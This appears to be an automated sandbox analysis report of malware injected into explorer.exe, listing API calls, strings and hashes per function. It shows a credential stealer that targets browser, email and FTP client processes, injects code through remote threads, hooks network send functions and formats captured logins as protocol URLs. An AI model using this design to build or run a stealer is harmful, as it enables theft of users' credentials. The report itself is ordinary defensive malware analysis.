Instruction Fuzzy Hash: E901A231905155EFCB251F20E86996F7B2AEFC176D7184461F90E83111CF31D992EAE1

Analysis Process: explorer.exePID: 7912, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	42.9%
Signature Coverage:	0%
Total number of Nodes:	49
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005D1DB0 Relevance: 4.6, APIs: 3, Instructions: 109
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 005D1E03
FindNextFileW.KERNELBASE ref: 005D1E7B
FindClose.KERNELBASE ref: 005D1E88

Part of subcall function 005D1EB4: FindFirstFileW.KERNELBASE ref: 005D1F05
Part of subcall function 005D1EB4: FindNextFileW.KERNELBASE ref: 005D1F7C
Part of subcall function 005D1EB4: FindClose.KERNELBASE ref: 005D1F89

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction ID: 87845ce94f43a8ec927f1c85db53cdcf8f9400916cf1eefe2c979fc6a3016c66
Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
Instruction Fuzzy Hash: 8F21953031CE085BDB58FB2CA8992693BD1FBD9350F50065FE94EC3296DE3499058789

Function 005D1EB4 Relevance: 4.6, APIs: 3, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005D1DB0: FindFirstFileW.KERNELBASE ref: 005D1E03
Part of subcall function 005D1DB0: FindNextFileW.KERNELBASE ref: 005D1E7B
Part of subcall function 005D1DB0: FindClose.KERNELBASE ref: 005D1E88

FindFirstFileW.KERNELBASE ref: 005D1F05
FindNextFileW.KERNELBASE ref: 005D1F7C
FindClose.KERNELBASE ref: 005D1F89

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction ID: c9adf96a8cd2910e0503255f87a6c7179af3b68267fa0ff60b3cc67d6ec7e852
Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
Instruction Fuzzy Hash: B1214F7020CE485BDB54FF2CA4983697BA1FBA8304F00066EA55AC3292DF38D944878A

Function 005D5300 Relevance: 1.6, APIs: 1, Instructions: 71
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 005D5378

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction ID: a5c639791343880e3d6699aced5391b19f8916859feabc3b1288f6c863b2dcf2
Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
Instruction Fuzzy Hash: 4B11A020601D0A4BEB6DFBBD949D2793B95FB54302F54092BE41AC63A2EA298A808701

Function 005D1D08 Relevance: 6.0, APIs: 4, Instructions: 47
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 005D1D1D
Process32First.KERNEL32 ref: 005D1D3C
Process32Next.KERNEL32 ref: 005D1D67
CloseHandle.KERNELBASE ref: 005D1D74

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction ID: 2c7005413fbcb231713b0f5a99a5b01176b4adac0298cf251ba04b6ac9fad29d
Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
Instruction Fuzzy Hash: 8B014430208E089FD755EB2CD8487AA7AE2FBD8315F00462EA15AC6255DB3899458745

Function 005DD748 Relevance: 4.7, APIs: 3, Instructions: 246
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 005DD847
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 005DD8E5
VirtualProtect.KERNELBASE ref: 005DD903

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005DC000.00000040.80000000.00040000.00000000.sdmp, Offset: 005DC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5dc000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction ID: 4b7666e349638fd27b1af28a790b33737f70267d7e1a94f5f7d414d19ade1078
Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
Instruction Fuzzy Hash: 86519B3265491D4BCB35AB3C9CC43F5BFE1F755322B580A7BC48AC3385EA58D88683A1

Function 005D1B74 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 005D1B8B
MapViewOfFile.KERNELBASE ref: 005D1BAA

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction ID: c301099572caa2f56b849c81ef4b7fe4a933e3a2bdb4ab0fc557db0b962be0f4
Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
Instruction Fuzzy Hash: DEF01235314F094FAB44EF7C9C8C535B7E1EBA8202B04867F995AC7165EF74C8818751

Function 005D4914 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005D1D08: CreateToolhelp32Snapshot.KERNEL32 ref: 005D1D1D
Part of subcall function 005D1D08: Process32First.KERNEL32 ref: 005D1D3C
Part of subcall function 005D1D08: CloseHandle.KERNELBASE ref: 005D1D74

Part of subcall function 005D1D08: Process32Next.KERNEL32 ref: 005D1D67

SleepEx.KERNELBASE ref: 005D4952

Part of subcall function 005D1EB4: FindFirstFileW.KERNELBASE ref: 005D1F05
Part of subcall function 005D1EB4: FindNextFileW.KERNELBASE ref: 005D1F7C
Part of subcall function 005D1EB4: FindClose.KERNELBASE ref: 005D1F89

Memory Dump Source

Source File: 00000015.00000002.2428785683.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5d1000_explorer.jbxd

Similarity

API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
String ID:
API String ID: 1868932505-0
Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction ID: ae0cc761076bef50c8e1b011f59cdf7ee020dd6786aa9b2be3501a573c77dfd8
Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
Instruction Fuzzy Hash: 7731A231208E095FDB69FB6CE8995AA77E2FB98301B50462FE44BC3261DE3499458B84

Analysis Process: explorer.exePID: 7944, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	97.4%
Signature Coverage:	0%
Total number of Nodes:	306
Total number of Limit Nodes:	42

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02791016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792608: VirtualQuery.KERNEL32(02794434,?,0000001C), ref: 02792615

Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02791038
RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279106B
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02791074
GetCurrentProcessId.KERNEL32(?,02791010), ref: 0279107A
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 027910DF
Process32First.KERNEL32(00000000,?), ref: 027910FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0279111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0279112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02791142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 02791156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0279117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0279118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 027911A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 027911B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 027911CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 027911DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 027911F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02791206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02791216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02791226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02791236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 02791246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02791256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02791266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02791276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 027912B4
Process32Next.KERNEL32(00000000,00000128), ref: 0279130B
CloseHandle.KERNELBASE(00000000), ref: 0279131C
Sleep.KERNELBASE(000003E8), ref: 02791327

Strings

thebat32.exe, xrefs: 02791198
263em.exe, xrefs: 0279123C
iexplore.exe, xrefs: 02791124
opera.exe, xrefs: 0279114C
filezilla.exe, xrefs: 027911D4
thebat.exe, xrefs: 02791184
mailmaster.exe, xrefs: 0279122C
smartftp.exe, xrefs: 027911E8
outlook.exe, xrefs: 02791170
mailchat.exe, xrefs: 0279126C
thunderbird.exe, xrefs: 027911C0
thebat64.exe, xrefs: 027911AC
microsoftedgecp.exe, xrefs: 027910D2, 02791160, 027912AE
cuteftppro.exe, xrefs: 0279121C
foxmail.exe, xrefs: 0279124C
chrome.exe, xrefs: 02791138
winscp.exe, xrefs: 027911FC
firefox.exe, xrefs: 02791114
flashfxp.exe, xrefs: 0279120C
alimail.exe, xrefs: 0279125C

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 2555639992-1680033604
Opcode ID: 0013bc2c8f0dcb72ffda1c990a55c4eeaf7970e0857b1165052c83113db4dbdc
Instruction ID: 0c5f84bcc0dd0eacdf458b5c14d49c8bfdec3666fb5c3f3d2dee69ca44f8b6ef
Opcode Fuzzy Hash: 0013bc2c8f0dcb72ffda1c990a55c4eeaf7970e0857b1165052c83113db4dbdc
Instruction Fuzzy Hash: 1971E470A80306ABEF10EBB1BC58E6F3BBCAF45784B844969F945D3140EB31D5168F64

Function 027910A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 027910DF
Process32First.KERNEL32(00000000,?), ref: 027910FE
lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0279111A
lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0279112E
lstrcmpiA.KERNEL32(?,chrome.exe), ref: 02791142
lstrcmpiA.KERNEL32(?,opera.exe), ref: 02791156
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02791166
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0279117A
lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0279118E
lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 027911A2
lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 027911B6
lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 027911CA
lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 027911DE
lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 027911F2
lstrcmpiA.KERNEL32(?,winscp.exe), ref: 02791206
lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 02791216
lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 02791226
lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 02791236
lstrcmpiA.KERNEL32(?,263em.exe), ref: 02791246
lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 02791256
lstrcmpiA.KERNEL32(?,alimail.exe), ref: 02791266
lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 02791276
lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 027912B4
Process32Next.KERNEL32(00000000,00000128), ref: 0279130B
CloseHandle.KERNELBASE(00000000), ref: 0279131C
Sleep.KERNELBASE(000003E8), ref: 02791327

Strings

thebat32.exe, xrefs: 02791198
263em.exe, xrefs: 0279123C
iexplore.exe, xrefs: 02791124
opera.exe, xrefs: 0279114C
filezilla.exe, xrefs: 027911D4
thebat.exe, xrefs: 02791184
mailmaster.exe, xrefs: 0279122C
smartftp.exe, xrefs: 027911E8
outlook.exe, xrefs: 02791170
mailchat.exe, xrefs: 0279126C
thunderbird.exe, xrefs: 027911C0
thebat64.exe, xrefs: 027911AC
microsoftedgecp.exe, xrefs: 027910D2, 02791160, 027912AE
cuteftppro.exe, xrefs: 0279121C
foxmail.exe, xrefs: 0279124C
chrome.exe, xrefs: 02791138
winscp.exe, xrefs: 027911FC
firefox.exe, xrefs: 02791114
flashfxp.exe, xrefs: 0279120C
alimail.exe, xrefs: 0279125C

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
API String ID: 3950187957-1680033604
Opcode ID: e1721f64c4813f4c0c5229c99abee81946b886444842a07f4276ab11bb8171b3
Instruction ID: cd7b00f7113e118f644eb880184c08a684c3497bb0800e94883cd635b57eac33
Opcode Fuzzy Hash: e1721f64c4813f4c0c5229c99abee81946b886444842a07f4276ab11bb8171b3
Instruction Fuzzy Hash: F251B170A4430AA6EF10EBB1BC85E2F7BFC6F85784B840969FA45D3040EB30D4168E75

Function 02797728 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002796000.00000040.80000000.00040000.00000000.sdmp, Offset: 02796000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2796000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970bd59b6bf5d4f1aa8fc9161d8aff61f7fccd063dd4caa5612f9bfe87950d94
Instruction ID: ce9519dad6f14470f6e6a739bfc177bfe3aec251c018b083fad2d17e198082ba
Opcode Fuzzy Hash: 970bd59b6bf5d4f1aa8fc9161d8aff61f7fccd063dd4caa5612f9bfe87950d94
Instruction Fuzzy Hash: 5B511AF1A643924FDF294B78EC80BB1FBA0DB42221B1D0679C5E5CB3C6E7945805C761

Function 02792861 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
RtlAllocateHeap.NTDLL(00000000), ref: 0279286B

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 41437db04885768c33c7075ee9d284919d13ca338c054ae07d948763cdfab2ac
Instruction ID: 3e6b977ef24b70db6769f69838a760e9fc063ff82158ba8ac38a945cc5928a27
Opcode Fuzzy Hash: 41437db04885768c33c7075ee9d284919d13ca338c054ae07d948763cdfab2ac
Instruction Fuzzy Hash: 05A00271D903407FDD4557A8A90FF553A2AA745701F4089847159C50509974585D8731

Non-executed Functions

Function 02791819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208
injectionnativesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792608: VirtualQuery.KERNEL32(02794434,?,0000001C), ref: 02792615

OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0279184E
NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02791889
NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02791919
RtlMoveMemory.NTDLL(00000000,02793428,00000016), ref: 02791940
RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02791968
NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02791978
CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02791992
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0279199A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 027919A8
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 027919AF
GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 027919C5
GetProcAddress.KERNEL32(00000000), ref: 027919CC
ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 027919E2
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A0C
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02791A1F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A26
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A2D
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02791A41
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02791A58
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A65
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A6B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02791A71
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02791A74

Strings

opera_shared_counter, xrefs: 0279198B
atan, xrefs: 027919BB
ntdll, xrefs: 027919C0
microsoftedgecp.exe, xrefs: 0279181D

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
API String ID: 1066286714-4141090125
Opcode ID: 1d4fd87372f5af9cf64439cf44d2821ba4a5c10b0305b58792a135262ad48a3d
Instruction ID: 11581cf7cbc006e4e6394654ead8f266492e6b6184f4148b3a2fb013f9911fca
Opcode Fuzzy Hash: 1d4fd87372f5af9cf64439cf44d2821ba4a5c10b0305b58792a135262ad48a3d
Instruction Fuzzy Hash: C961CD71A44305AFDB10DF24AC88E6BBBEDEF88754F404A58F949D3240DB30DD118BA6

Function 0279263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0279265A
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02792672
lstrlen.KERNEL32(?,00000000), ref: 0279267A
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02792685
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0279269F
wsprintfA.USER32 ref: 027926B6
CryptDestroyHash.ADVAPI32(?), ref: 027926CF
CryptReleaseContext.ADVAPI32(?,00000000), ref: 027926D9

Strings

%02X, xrefs: 027926B0

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 376540b31b63fc5976d7ddb4a46d448ccba856669e9e4ae5a18b2d632267642c
Instruction ID: ca355cd103e0328d9aae9582d7999a34c00355f583d192d996a18da665a3a082
Opcode Fuzzy Hash: 376540b31b63fc5976d7ddb4a46d448ccba856669e9e4ae5a18b2d632267642c
Instruction Fuzzy Hash: BF113DB1D40208BFEB119B99EC88EAFBFBDEB44741F1084A5F605E2150D7718E22DB60

Function 02791332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792861: GetProcessHeap.KERNEL32(00000008,0000A000,027910CC), ref: 02792864
Part of subcall function 02792861: RtlAllocateHeap.NTDLL(00000000), ref: 0279286B

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0279109E,?,02791010), ref: 0279134A
GetCurrentProcessId.KERNEL32(00000003,?,0279109E,?,02791010), ref: 0279135B
wsprintfA.USER32 ref: 02791372

Part of subcall function 0279263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0279265A
Part of subcall function 0279263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02792672
Part of subcall function 0279263E: lstrlen.KERNEL32(?,00000000), ref: 0279267A
Part of subcall function 0279263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02792685
Part of subcall function 0279263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0279269F
Part of subcall function 0279263E: wsprintfA.USER32 ref: 027926B6
Part of subcall function 0279263E: CryptDestroyHash.ADVAPI32(?), ref: 027926CF
Part of subcall function 0279263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 027926D9

CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02791389
GetLastError.KERNEL32 ref: 0279138F
Sleep.KERNEL32(000001F4), ref: 027913A1

Part of subcall function 027924D5: GetCurrentProcessId.KERNEL32 ref: 027924E7
Part of subcall function 027924D5: GetCurrentThreadId.KERNEL32 ref: 027924EF
Part of subcall function 027924D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 027924FF
Part of subcall function 027924D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0279250D
Part of subcall function 027924D5: CloseHandle.KERNEL32(00000000), ref: 02792566

GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 027913B8
GetProcAddress.KERNEL32(00000000), ref: 027913BF
GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 027913E4
GetProcAddress.KERNEL32(00000000), ref: 027913EB

Part of subcall function 02791DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 02791E1D

RtlExitUserThread.NTDLL(00000000), ref: 0279141D

Strings

WSASend, xrefs: 027913DA
send, xrefs: 027913AE
ws2_32.dll, xrefs: 027913B3, 027913DF
%s%d%d%d, xrefs: 0279136C

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
String ID: %s%d%d%d$WSASend$send$ws2_32.dll
API String ID: 706757162-1430290102
Opcode ID: 6074b262b3381813d9a2ca43655930ef0b9d28ee04fd13b41a5dfaf8da5e1298
Instruction ID: 1c1b8738bca5b58c153e6e0629ce795ad8c46284b42c73b8e1196c3ea2e5f36e
Opcode Fuzzy Hash: 6074b262b3381813d9a2ca43655930ef0b9d28ee04fd13b41a5dfaf8da5e1298
Instruction Fuzzy Hash: DE316F31B80715BBEF117FA5BC1DB6F3B6BAF0A745F008454F90A96291CB7598228B90

Function 02791647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(02794220,?,?), ref: 02791679
lstrlen.KERNEL32(?), ref: 02791686
getpeername.WS2_32(?,?,?), ref: 027916A0
inet_ntoa.WS2_32(?), ref: 027916B1
htons.WS2_32(?), ref: 027916BF
wsprintfA.USER32 ref: 02791725

Strings

smtp://%s:%s@%s:%d, xrefs: 027916F3, 02791723
ftp://%s:%s@%s:%d, xrefs: 02791708
imap://%s:%s@%s:%d, xrefs: 027916FA
pop3://%s:%s@%s:%d, xrefs: 02791701

Memory Dump Source

Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2791000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
API String ID: 3379139566-1703351401
Opcode ID: 5fa7a4903e886af1fbac1574062721c9f7277184488364c778b3684dc6aafd0c
Instruction ID: b8c5b631f9b4fb8181db29fd1bd51b43553f2d361499564c343c46cd0d370315
Opcode Fuzzy Hash: 5fa7a4903e886af1fbac1574062721c9f7277184488364c778b3684dc6aafd0c
